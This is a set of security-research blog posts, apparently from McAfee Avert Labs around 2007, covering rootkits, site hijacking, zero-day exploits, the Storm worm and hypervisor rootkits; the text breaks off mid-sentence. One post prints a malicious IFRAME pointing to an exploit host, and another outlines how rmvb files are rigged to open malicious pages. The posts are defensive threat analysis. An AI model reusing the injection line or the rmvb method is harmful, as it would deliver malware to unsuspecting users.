These days most rootkits are installed through exploitation of web browser vulnerabilities or from the infection of viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits on to user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, Baofeng ActiveX vulnerability, RealPlayer ActiveX vulnerability and so on. In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against. Another technique used to spread rootkits includes the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..

References:

Rootkit Paper 1
Rootkit Paper 2

For a long time, we spoke regularly about IFRAME injection. This year, many pages belonging to legitimate sites were secretly modified. Many will remember the Italian Job and the thousands of infected sites in the realm of tourism, the car industry, movies and music.

The people behind these attacks love to use highly topical issues in order to attract as many people as possible. This week in my country, the visit by Libyan President Muammar Khadafi is stirring controversy. It has made many headlines in France. No doubt this is why the French Embassy Web Site is now infected by malicious code. Please do not attempt to reach the site, it is still dangerous.

This first iframe, routes the victim to sites hosted through Hong Kong provider. Two further links then redirect the visitor.

From Hong Kong, we move to Russia and Ukraine where exploit and downloaders are used (Exploit-YIMCAM and downloader-AUD).

Once again, we can see how people involved in such attacks use dedicated malicious web sites in various countries to make it difficult to defeat them. It is especially difficult when an ISP accepts to host web sites without verifying the lesser data the criminals enters when they register. The following example I found when I looked at this attack fully demonstrates this:

Recently, I had some friends complain about problems with Real Media files (*.rm/*.rmvb). According to them, after downloading and playing rmvb files, the Real Media Player launched a malicious webpage without prompting. Later, they noticed their OS running noticeably slower. And later still, they found their IM account passwords modified and online gaming accounts stolen.

It appears that the media files they downloaded were created by a hacker and designed to open malicious webpages. I investigated this and found it is quite easy to add a malicious webpage to rmvb files. The hacker used freely available software. These programs include applications which can be used to add events to rmvb files. A time and URL is specified in a text file, then imported into the rmvb file using these programs, and that’s it!. When the rmvb file is opened in RealPlayer, the URL will automatically be opened after the specified time has elapsed. My advice was to scan any downloaded media files with antivirus software before playing it. Another option is to use a different player other than RealPlayer.

Hope you can enjoy Real Media without the malicious webpages!!!

You may have seen a number of news reports in the past day or two on the active exploitation of a Microsoft Access vulnerability. Here is one story by PC World.

The US-CERT’s current activity Web page, “a regularly updated summary of the most frequent, high-impact types of security incidents currently being reported to the US-CERT,” warned about this active exploitation on December 10.

It is rumored that the vulnerability being exploited is CVE-2007-6026.

Avert Labs is working to find out more. As they say in the press, watch this space!

While we wait, here’s what we know about CVE-2007-6026. It’s a stack overflow in Access. A user would have to open a specially crafted Access database for an attack to take place. Although user assistance is required for exploitation, an exploit could be delivered over various attack vectors, including the Web, e-mail, and IM. Attacks could be coupled with well-establishing social engineering techniques. And now for the rub: This vulnerability is currently unpatched.

It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

Most of the virus researchers in Avert spend their days analyzing samples coming in from customers. With a good percentage of the samples coming in every day being unknown, there’s plenty to keep us busy, 24/7/365. But what is it like, sorting through an unending stream of samples every day? What does that entail?

It’s a bit like trying to identify a life-form from a disconnected body part. Sometimes the body part is actually the whole animal, but it’s often just a toenail or a feather. There are times where we don’t even get a body part, but a footprint or a piece of the animal’s droppings.

Sometimes we’ll get lucky and it’s an animal whose footprint we know really well, or which has very distinctive feathers. Then we can say “there’s a good chance what you have is a peacock”, based on just that feather. But more often than not, people are dealing with something entirely new or rare. Perhaps this critter only displays its distinctive traits in very specific circumstances.

Of course, our favorite sort of sample is one which is a complete body with a good explanation of where and how the animal was found. Whereas a foot accompanied by no information may get an answer of “This is an amphibian”, more of the animal or more context can increase the odds of us being able to say something more specific: “This is Litoria caerulea – aka the Dumpy Tree Frog. It lives in Australia and it is often found hiding in downspouts.”

So how does someone wishing to submit something for analysis go about doing it?

For starters, include as much info as you can: What version of security product are you using? In the case of our products, what version of the product, what engine and DAT files are you using? Are you seeing detection with some AV product? What filename and virus name was given? Are you seeing strange behavior that you associate with the file?

Getting the whole beast can be a bit more tricky. There’s sort of a continuum of sneakiness, from very spammy looking emails with attachments, to bots which get in through software vulnerabilities and then drop rootkits. If you’re the “lucky” recipient of the easy variety, ZIP up that email and send it to us.)

If your sample falls somewhere on the sneakier side of the spectrum, files can really be scattered all over a machine, and some of them are particularly good at hiding. You may want to try scanning your system with the Rootkit Detective or the Beta DATs from the Avert Tools page. This can help identify more suspicious files.

Maybe you’re pretty astute and you’ve noticed that after you ran a file a strange file, it created hundreds of randomly named files in your Windows directory. We may or may not need more than one of those files. You’ll want to check for duplicates, to make sure. If you know how to generate hashes for a file, just make sure you have one of each unique hash, up to about 10. (If you have something parasitic or polymorphic this will give us a decent representation) If you’re not sure how to create a hash, there are certain programs which can help you. One of my favorites is the CRC option in WinZIP (in Configurations, under the Options menu). This allows you to group by CRC and get rid of any duplicates.

In short, try not to just send a blurry video of Sasquatch (or is that a guy in a gorilla suit?) or to send us a hundred disembodied ant legs. The more thorough and complete the sample, the better the chances of getting a complete picture of what’s plaguing your machine.

McAfee Avert Labs today observed e-mail messages with malicious PDF attachments exploiting the critical Adobe Acrobat Mailto Unspecified PDF File Security Vulnerability (CVE-2007-5020) being spammed in the wild. Successful exploitation leads to a batch file being executed on the victim’s machine that disables the built-in windows firewall and then downloads a password stealer from an ip address located on the RBN network.

Malware authors will find this technique of sending exploit-laden PDF files extremely profitable especially in targeted attacks since the Portable Document Format is the de-facto standard for exchanging electronic documents. PDF files have traditionally been unfiltered at the email gateway and until recently were considered risk free in stark contrast to the notorious history associated with Microsoft Office documents.

But with Microsoft making it difficult for attackers by raising the bar for buffer overflow exploits with the release of Windows Vista and Microsoft Office 2007, we expect to see exploit writers target the lower hanging fruit. Abusing exploits in popular applications such as Adobe, Apple, RealPlayer or Antivirus products are proving to be just as advantageous and profitable for the bad guys. McAfee Avert Labs anticipate spammers in collusion with malware authors to continue exploiting popular application flaws and it is imperative that users are educated on how to avoid becoming a victim.

Users running vulnerable versions of Adobe Reader and Acrobat 8.1 or earlier are strongly advised to update them from the Adobe site. McAfee users are pro-actively protected against Exploit-PDF based threats with the latest dat files.

Earlier today we posted a blog entry: RealPlayer Zero Day Exploit Hits the Web.  Well RealPlayer responded RealQuick.  In less than 24 hours they managed to ship a patch.  That’s what I call rapid response.  Real also states that more information will be posted on their Security Updates & Incident Reports page.

Earlier today McAfee’s Regional Virus Info identified over 250 unique machines reporting Exploit-RealPlay.a detections, 99% of which reside in the US.  This does not mean that each of these systems were vulnerable, but it does mean that in all likelihood thousands of systems worldwide were exposed to the malicious code.

Last night we obtained a sample of a RealPlayer zero day exploit.  RealPlayer 11 Beta, 10.5, and older versions are affected.  Today’s DAT release, version 5145, contains detection under the name Exploit-RealPlay.a.  At this point, exposure appears to be limited, but we can expect public exploit code to surface before too long.  At that point exploitation is likely to follow the path of many other drive-by exploits and become fairly well distributed.

The vulnerability lies in a RealPlayer ActiveX control, and can be mitigated by setting the appropriate kill bit via the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5} 

While we generally keep this blog research focused (and shy away from mentioning products), zero day exploit announcements seem half-done without some mention of information on how our products deal with the threat.

McAfee product coverage information will be sent out via a McAfee Avert Labs Security Advisory service shortly.  This includes coverage information for the following product lines.

• All McAfee virus scanning technologies that utilize the DAT files, including:
• GroupShield
• LinuxShield
• PortaShield
• Secure Internet Gateway
• Secure Messaging Gateway
• Secure Web Gateway 
• Total Protection (TOPS)
• VirusScan Enterprise
• VirusScan Online
• VirusScan Enterprise Buffer Overflow Protection
• Host IPS
• IntruShield
• Foundstone
• McAfee Network Access Control (MNAC)
• McAfee Policy Auditor and McAfee Remediation Manager compliance

The latest trick Nuwar (aka Storm) plays looks like this:

Like previous variants, the HTML page contains a script that attempts to execute the malicious file hosted on the webserver. However even if this exploit code gets blocked by AV software or not executed at all because of security settings in the browser – the user still has the option to click on the download button and infect their machine.

Make sure you’re protected so you do not join the Storm network!

Nuwar (aka Storm Worm) changed tactics yet again. Now it attempts to lure its victims by a promise of a good laugh at a “Psycho cat”:

If you do click on the URL you get a page loaded with the usual cocktail of exploits etc.:

So, if you’re not running an on-access antivirus you are in trouble. The page itself pretends to be a funny greeting, complete with a ShockWave clip of a laughing kitty with an appropriate and rather infectious (pun intended) laughter audio.

And, of course, pretty much wherever you click on the page, you get nothing but Nuwar.

Š

Following our blog about the significance of web hosting security vs ARP spoofing, our friends from security vendor ESET made an official statement on October 9th, about an ARP attack against their official China website earlier this week. Identical to other ARP attacks, their web pages were found inserted with the following malicious IFRAME link:

<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>

The “yy.htm” web page, detected generically as Exploit-MS06-014 , can download a variety of malware including:

• vip1.htm (Exploit-BaoFeng.a)
• 0.exe (PWS-QQGame)
• kvmxeis.exe (PWS-OnlineGames.a)
• ii.exe (PWS-QQPass.dll)
• SysWin78.Jmp (PWS-QQGame)
• WinSys88.Sys (PWS-QQGame)
• System6.ins (PWS-QQPass.dll)

In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks -style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.

With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities – Exploit-MS06-014, Exploit-MS07-004, etc. to application-level vulnerabilities such as Yahoo Messenger, a Chinese media player called Baofeng and PPStream.

Network intrusion prevention security, web server policies and patch management comes to mind as needed minimum defenses and should to be reviewed by companies both using or offering web services as well as ISPs.

W32/Nuwar aka the Storm worm ever since it debut in Nov 2006 has relentlessly flooded internet users with its ever-changing email campaigns. With the storm worm authors having this uncanny knack of using sensationalist themes that draw public attention, the morbid curiosity it has generated has ensured that is the most blogged about piece of malware this year!

The latest campaign is an HTML formatted email using the Labor Day theme, inviting users to view an online greeting card. A copy of the spammed email is as follows:

The authors have used anchor tags in HTML to mask the greeting card link so that an unsuspecting user does not notice that it actually points to a malicious ip address. Hovering the mouse over this disguised link is a quick and dirty way to reveal the real destination address. Users who fall for this bait are directed to the following Happy Labor Day page.

Everything looks hunky-dory except an unsuspecting user is served an xor’ed exploit cocktail in the background. In addition to the usual Microsoft exploits, QuickTime and WinZip buffer overflow exploits are also attempted on a user’s machine. Given the slim likelihood of vulnerable third party applications being up to date on a user’s machine, it increases the attacker’s chances of a successful exploitation. Especially since most applications do not support automated updates and it is left up to the users to first find out if they have a vulnerable version of the application and then manually patch it.

Enterprise customers have the bandwidth and resources to ensure every machine on the corporate network is fully patched. It is usually home consumers – the low hanging fruit that fall prey to these malicious tactics. For users wanting to check if third party applications on their systems are vulnerable, a free online resource to visit would be the Secunia Software Inspector. Happy Patching

The patches for the Webcam vulnerabilities we reported earlier have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

I’m excited to announce YAAVB! No doubt you recognize that acronym as “yet another anti-virus book.”

And the book that I am proudly holding in my hands is entitled “AVIEN Malware Defense Guide,” and I contributed a chapter to it.

In its 540 pages we cover the following topics:

1. “Customer Power and AV Wannabes”
2. “Stalkers on Your Desktop”
3. “A Tangled Web” (by yours truly)
4. “Big Bad Botnets”
5. “Creme de la Cybercrime”
6. “Defense-in-depth”
7. “Perilous Outsourcery”
8. “Education in Education”
9. “DIY Malware Analysis”
10. “Antimalware Evaluation and Testing”
11. “AVIEN and AVIEWS: the future”

Here’s the team that worked on this book: David Harley, Ken Bechtel, Michael Blanchard, Henk Diemer, Andrew Lee, Igor Muttik, Bojan Zdrnja, Paul Baccas, Tony Bradley, Ken Dunham, Jim Melnick, Enrique Gonzalez, Judith Harley, Dave Phillips, Paul Schmehl, Robert Vibert, and James Wolfe. I would like to express my sincere thanks to David Harley, who put together this team of professionals and led us through a book-writing exercise. It was fun!

I have not yet read all the chapters, but I know the guys well and expect great contributions from all of them!

The book came out under the umbrella of AVIEN (Anti-Virus Information Exchange Network–www.avien.net). This group was formed around 2001 to exchange information related to malware outbreaks. In recent years, due to the lack of large-scale outbreaks, participants simply share all sorts of security information and enjoy communicating with each other. One of the outcomes is this book.

Finally, the book was published by Syngress, retails for US$59.95 (ISBN-13: 978-1-59749-164-8), and is available from major book stores: http://www.amazon.com/AVIEN-Malware-Defense-Guide-Enterprise/dp/1597491640. So far there are two positive reviews, though both came from the team of authors.

I hope you enjoy the book, and I look forward to reading your valuable comments!

Another exploit targeting a Japanese application is found today. This time, a free decompress tool, LHAZ v1.33, was used in a targeted attack. Maliciously crafted zip files could take advantage of an unidentified vulnerability in this tool and drops a BackDoor-CKB trojan.

Two months ago, we’ve published information about an exploit against a free LHA decompress tool, Lhaca which is quite popular in Japan.

Whilst these tools may not be as widely used as commercial tools, perception could be that such free tools are not worth targeting and are safe to use. Exploit-LHAZ.a is just a reminder that software, Windows or MacOS, English or localized, free, open source or commercial, are subjected to the same security threats.

More details of Exploit-LHAZ.a at http://vil.nai.com/vil/content/v_142976.htm.

[UPDATE]
Yahoo has fixed its Webcam vulnerability. The patches for the Webcam vulnerabilities have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

[Original blog:]
Earlier today Karthik had blogged about details of a new zero day in Yahoo! Messenger being published on some security forums in China, we got a chance to dig a bit deeper into this and were able to reproduce the vulnerability on Yahoo! Messenger version 8.1.0.413 based on the information provided in the forum. It seems like a classic heap overflow which can be triggered when the victim accepts a webcam invite. Note that this vulnerability is different from the recently patched one in June which exploited the Yahoo! Webcam ActiveX controls. 

We’ve been able to reach Yahoo! security team and have informed them about this issue. 

We recommend the following to users using Yahoo! Messenger Webcam:

1) Don’t accept webcam invites from untrusted sources until a patch for this is released.

2) It’s advisable to block outgoing traffic on TCP port 5100 until the vendor patches this vulnerability.

To mitigate this, we’re releasing our NIPS IntruShield signatures today to protect Yahoo! Messenger users from this threat. We shall keep on monitoring this threat and update if we come across anything.

A post on a Chinese-language security forum claims that there is a zero-day vulnerability in Yahoo Messenger. Researchers at Avert Labs have found that this flaw may allow for user-assisted remote-code execution attacks. No code exploiting this flaw has been published yet.

 We’re currently working with Yahoo to be able to confirm or deny that this is a zero-day.

We’ll keep you updated.

We have been studying the issue of malicious hypervisors for quite some time at McAfee Avert Labs and have come up with several techniques to detect whether the system runs on top of a hypervisor or whether there is a piece of code that is trying to initiate a hypervisor. Our work included, of course, analyzing things like Blue Pill and other similar malicious hypervisors.

Last week I was at BlackHat, and it was a very exciting week in terms of Blue Pill and the virtualization rootkits issue in general. During the BlackHat 2007 Briefings in Las Vegas there were three interesting sessions that relate to virtualization system security and rootkits. I attended those three sessions and had a chance to chat some with three presenters. The main points I would emphasize are the following:

1. Providing a system virtualization facility at the processor level without applying any sound security policy is a serious design flaw.
2. A malware authors’ job is to leverage system design flaws and hence the virtualization rootkits were very expected, including Blue Pill.
3. There is no rootkit that is undetectable even if it installs itself as a hypervisor. The challenge is always in how to repair rootkits once they control some layer in the system architecture
4. There needs to be a more organized effort between hardware virtualization vendors, software hypervisor providers and security companies to ensure the secure deployment of virtualization solutions

Now before I go into what happened during the three sessions at BlackHat, I would like to provide our readers with some background and personal thoughts about this topic. Less than two years ago, both Intel and AMD started to provide virtualization support at the processor level. This support is essentially comprised of a set of processor enhancements that improve traditional software-based virtualization solutions. These integrated features give virtualization software, namely Virtual Machine Monitors (VMMs) and Hypervisors, the ability to take advantage of offloading workloads to the system hardware, enabling more streamlined virtualization software stacks and “near native” performance characteristics. For instance, virtualization-enabled processors allow VMMs to rely on the hardware for isolating and mapping memory between virtual machines. This is achieved by adding another level of indirection for mapping VM-based physical address to host-based physical addresses. Both Intel and AMD also provide an additional level of indirection for mapping VM I/O addresses to host I/O physical address. Virtualizing memory addresses and I/O addresses at the processor level is a great extension that would minimize the work done by today’s software hypervisors. However, in doing that neither Intel nor AMD considered the security risk by providing such a powerful facility in the hardware with no restriction to which software piece could take advantage of it. In theory there have been lots of publications about safer computing initiative and how to use TPM technology to authenticate the piece of software that is initializing the processor into the virtualization mode. But in reality, this was not provided in the first release of the virtualization-aware processors as the hypervisors authentication was not provided at the firmware or BIOS level.

Now think of that with me for a moment – we have now a very powerful un-locked facility in the processor that allows any piece of software running in ring zero (like a device driver) to initialize a processor-supported hypervisor and hence take control of the whole computing environment, including the operating system. Yes, this is true, and it was a serious design flaw. Of course both Intel and AMD designers assumed that operating system kernel developers are the only ones who would care about virtualization and would use that facility provided by their processors, which turned out to be untrue. Joanna Rutkowska (the Blue Pill author) and other people have demonstrated some sample code that would initiate a hypervisor, and since it runs outside the operating a system then it can be considered a rootkit. But as the reader may understand now, there are no secrets there. No undocumented stuff; it is all about a powerful hardware feature that was not protected by any security policy.

Now to make the situation worse, both Intel and AMD are competing in that space and I guess both are trying to get software virtualization vendors to rely on their processor native virtualization support. But software-based hypervisors do more than memory and I/O virtualization. They do binary translation for instance which allows them to control programs execution at the instruction level and control programs response to system interrupts. To accommodate that need, both Intel and AMD provide the ability to exit from the VM to the VMM when a certain instruction is executed or a certain condition takes place inside the VM. For hackers this is a very lucrative feature, so not only can they install a thin hypervisor but they can also control the execution of certain instructions and fake many things from below the operating system, like timestamp counters which used to be a very reliable method for measuri